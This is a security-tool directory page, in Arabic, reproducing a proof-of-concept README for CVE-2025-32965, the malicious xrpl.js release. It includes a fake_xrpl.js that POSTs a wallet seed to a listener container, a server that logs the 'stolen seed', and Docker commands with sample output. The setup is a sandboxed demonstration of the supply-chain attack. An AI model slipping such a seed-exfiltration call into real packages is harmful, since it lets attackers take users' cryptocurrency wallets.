Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32965-xrpl-js-poc — رمز CVE: CVE-2025-32965 نوع الثغرة: هجوم سلسلة التوريد (CWE-506: تعليمات برمجية خبيثة مدمجة) الهدف: إصدارات 4.2.1–4.2.4 و 2.14.2 من مكتبة xrpl.js التأثير: إرسال بيانات seed/secret الخاصة بمحفظة المستخدم إلى المهاجم | Kitploit
أدوات/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
تحليل الثغرات الأمنيةالاستغلالتسريب البياناتتحليل البرمجيات الخبيثةأمن سلسلة التوريدالتعلم والتعليم
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

رمز CVE: CVE-2025-32965 نوع الثغرة: هجوم سلسلة التوريد (CWE-506: تعليمات برمجية خبيثة مدمجة) الهدف: إصدارات 4.2.1–4.2.4 و 2.14.2 من مكتبة xrpl.js التأثير: إرسال بيانات seed/secret الخاصة بمحفظة المستخدم إلى المهاجم

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32965 — تقرير PoC لهجوم سلسلة التوريد على xrpl.js

وصف الثغرة

  • معرّف CVE: CVE-2025-32965
  • نوع الثغرة: هجوم سلسلة التوريد (CWE-506: كود خبيث مضمّن)
  • الهدف: إصدارات 4.2.1–4.2.4 و2.14.2 من مكتبة xrpl.js
  • التأثير: إرسال بيانات seed/secret الخاصة بمحفظة المستخدم إلى المهاجم

الهدف

يهدف هذا الـ PoC إلى إظهار كيفية قيام إصدار ضار من xrpl.js بتنفيذ سرقة (تسريب) الـ seed في بيئة معزولة.

بنية البيئة

  • المنصة: Docker (Ubuntu مبني على WSL)
  • الشبكة: شبكة Docker خاصة باسم xrplnet
  • الحاويات:
    • poc-listener: خادم المهاجم الذي يجمع بيانات الـ seed
    • xrpl-poc: حاوية PoC التي تحتوي على نصوص الاختبار الخاصة بالضحية

الملفات المستخدمة

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20 WORKDIR /app COPY . . RUN npm install CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

الخطوات

  1. بناء Docker:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. تشغيل الـ Listener:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. إرسال الـ Seed من الضحية:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

مثال على المخرجات

طرفية الضحية:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

طرفية المهاجم:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

الخلاصة

أظهر هذا الـ PoC كيف يمكن استغلال ثغرة CVE-2025-32965 عمليًا. تم تنفيذ كود سرقة الـ seed الخاص بمكتبة xrpl.js الضارة بنجاح في بيئة اختبار معزولة، وتم تسريب البيانات إلى خادم المهاجم.

هيكل مستودع GitHub (مقترح)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

إعداد: Yusuf Dalbudak بيئة الاختبار: WSL2 + Docker + Node.js v20

تنزيل الأداة